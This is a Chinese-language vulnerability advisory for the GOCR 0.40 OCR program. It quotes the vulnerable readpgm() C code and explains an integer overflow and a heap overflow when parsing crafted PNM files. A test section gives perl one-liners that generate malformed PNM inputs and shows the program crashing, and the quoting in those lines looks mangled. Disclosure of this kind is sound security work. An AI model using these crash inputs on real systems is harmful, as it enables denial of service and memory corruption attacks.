受影响系统:
sourceforge GOCR 0.40
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13197
GOCR是一款在GNU公共许可下开发的光学字符识别(OCR)程序。
GOCR中存在本地可利用的堆溢出和整数溢出,可能允许攻击者执行任意代码。
1 readpgm()整数溢出
GOCR在读取特制的PNM文件时存在整数溢出,可能导致堆溢出。有漏洞的代码存在于使用netpbm库的readpgm()函数中:
src/pnm.c:
...
/*
for simplicity only PAM of netpbm is used, the older formats
PBM, PGM and PPM can be handled implicitly by PAM routines (js05)
*/
#ifdef HAVE_PAM_H
void readpgm(char *name, pix * p, int vvv) {
...
/* read pgm */
pnm_readpaminit(fp, &inpam, sizeof(inpam));
p->x = inpam.width;
p->y = inpam.height;
if ( !(p->p = (unsigned char *)malloc(p->x*p->y)) )
F1(`Error at malloc: p->p: %d bytes`, p->x*p->y);
...
for ( i=0; i < inpam.height; i++ ) {
pnm_readpamrow(&inpam, tuplerow);
for ( j = 0; j < inpam.width; j++ ) {
...
p->p[i*inpam.width+j] = sample;
...
}
}
}
如果p->x*p->y溢出了整数变量,攻击者就可以为图形缓冲区分配不充分的内存。
2 readpgm()堆溢出
GOCR在读取特制的纯PNM文件(P3格式)时存在堆溢出。有漏洞的代码存在于不使用netpbm库的readpgm()库中:
src/pnm.c:
/*
if PAM not installed, here is the fallback routine,
which is not so powerful
*/
void readpgm(char *name,pix *p,int vvv){
...
pic=(unsigned char *)malloc( nx*ny );
...
if( c2==`3` )for(mod=k=j=i=0;i<nx*ny*3 && !feof(f1);){
c1=read_char(f1);
if( !isdigit(c1) ) { if( !isspace(c1) )F0(`unexpected char`);
if(1&mod) { k+=j; if(mod==5){ pic[i]=k/3; i++; }
j=0; mod=(mod+1)%6; } }
else { j=j*10+c1-`0`; if(!(mod&1)) mod++; };
}
...
pic向量大小仅为nx*ny个元素,但“i<nx*ny*3 && !feof(f1)”时循环结束,因此如果文件有更多字节的话pic向量可能溢出。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
整数溢出:
bash-2.05b$ perl -e `print `P4 10737418225`; print `0 `x1024` >
vuln.pnm bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)
堆溢出:
bash-2.05b$ perl -e `print `P10 125`; print `0 `x1024` > vuln.pnm
bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)